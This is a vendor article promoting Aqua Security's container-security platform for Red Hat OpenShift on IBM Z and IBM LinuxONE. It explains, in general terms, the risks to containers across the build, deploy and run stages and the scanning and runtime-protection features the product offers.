Securing Containerized Applications
on IBM Z and IBM LinuxONE

One of the key use-cases enabling mainframe modernization is the use of mainframes to run workloads built as containers, the building blocks of modern, cloud-native applications. IBM mainframes have risen to this challenge by extending IBM’s Red Hat OpenShift container orchestration platform to support the IBM Z and IBM LinuxONE architecture.

Containers offer a standardized way of building, packaging and managing applications across multiple platforms and clouds. They are highly portable, automatically orchestrated, and offer resilience and scalability. The benefits of using containers are many – modern applications are architected using a micro-services approach, which allows for both elasticity and scale, as well as independent, continuous updates of loosely-coupled services. This enables organizations to innovate at a rapid pace, meet customer expectations faster, quickly adapt to changing requirements, and compete effectively in a demanding market.

For organizations that have invested in mainframe infrastructure, running containers on mainframes is a great way to extend it beyond traditional uses, capitalize on the investment, and provide seamless quality of service even in the most high-performance, large-scale environments.

And for teams that already use containers as a vehicle for developing and deploying applications, the ability to choose whether to run them on public cloud infrastructure, on X86-based virtualized private clouds, or on high-performance IBM LinuxONE means greater flexibility and cost-to-performance ratio, all while maintaining the exact same continuous integration and deployment (CI/CD) processes, methods, and technologies.

OpenShift Container Platform on Z (OCPz)

Red Hat OpenShift is the leading container management platform. It enables organizations to build, deploy and orchestrate applications based on containers, built on the standard OCI (Open Container Image) format, which can run on any Linux or Windows infrastructure, on any public or private cloud. By enabling OpenShift for IBM Z, customers can extend OCPz to run on high-performance mainframes.

IBM LinuxONE is available in pre-packaged configurations optimized for OCPz and different types of applications and workloads. This ensures that OpenShift is ready to work right out of the box, shortening time to value.

Protecting Containerized Applications

So what about security? Do containerized applications require specialized security tooling?

The short answer is yes. Containers are built using a large proportion of open-source components, and might therefore include code with known vulnerabilities, or even malware inserted through supply chain attacks. Because container images are rebuilt frequently, each new version must be examined closely. Additionally, since known vulnerabilities in open source are disclosed regularly, even a container image that was built from “clean” open source might find itself vulnerable after the fact.

When containers are deployed and running, they are orchestrated and managed automatically to start and stop, replicate for scale, and get refreshed from updated images. The same container could run on one node (server) one minute, and on multiple others later on. This means that there’s no permanent IP address where the container is found, so traditional network-based controls are ineffective.

The orchestration platform – in our case the Kubernetes-based OpenShift Container Platform – is also susceptible to misuse and manipulation by both attackers and insiders.

All of the above means that traditional solutions used in application security to protect servers and production environments fall short of providing adequate security controls for containers. They cannot handle the flow of code updates, the ephemeral nature of containers, the lack of permanence of network connections, and the full context of container processes running in a Linux environment.

The approach to securing containers must take into account the full lifecycle of the container build, deploy, and run stages:

1.      In development, the full SBOM (Software Bill of Materials) of container images is analyzed, and scanned for security issues: vulnerabilities, secrets, malware, and configuration issues that violate best practice (for example, running a container with root privileges).
These are all risks that should be minimized, and security teams should be able to have full visibility into what’s flowing into their production environment, as well as the ability to affect remediations.

2.      In deployment, use the data collected in development to set thresholds for deployment and assess the infrastructure into which the containers are deployed, be it the orchestration or operating system level.

3.      Finally, at runtime the container workloads must be monitored, to ensure they are not being exploited, and that actions that are part of an attack sequence such as privilege escalation, network traversal, data exfiltration and running of unapproved executables and malware are detected and handled. Most of these activities can only be detected and intercepted by an agent on individual nodes/hosts and cannot be detected or stopped via the network or via APIs.

Aqua Platform on IBM Z and LinuxONE

When deployed on IBM Z and IBM LinuxONE, Aqua Security enables customers to secure their containerized applications by managing vulnerabilities, reducing their attack surface, ensuring compliance with regulatory and security requirements, and providing real-time monitoring and defense for running applications.

Aqua scans container registries for vulnerabilities, exposed secrets, configuration issues and malware, ensuring applications pose minimal risk before deployment. Customers can set highly granular policies to control their risk threshold and initiate remediation and mitigation flows.

After deployment, Aqua protects containers using its purpose-built Enforcer agents, enabling multiple layers of defense at runtime:

·       Ensuring the integrity and compliance of container images before they are deployed, and blocking deployment if necessary – in registries and CI/CD pipelines

·       Scanning OpenShift nodes for vulnerabilities, malware and misconfiguration in real time

·       Monitoring the behavior of container workloads, detecting anomalies based on behavioral patterns of attack

·       Preventing a host of common attack vectors including in-memory execution, reverse-shell, and crypto-mining attempts

·       Providing options for automated responses to attacks, including real-time process blocking and malware removal

Summary

With Aqua Security’s full-lifecycle security for OCP on IBM Z and IBM LinuxONE,[MR2]  organizations can safely deploy and run containerized applications, enjoying the same level of comprehensive security controls in development and runtime that they employ in other cloud environments; while benefiting from the performance, service levels, scale and cost-effectiveness of IBM Z and IBM LinuxONE.

[Learn more: https://hubs.li/Q03819jn0]

Author : Rani Osnat (https://www.linkedin.com/in/raniosnat/)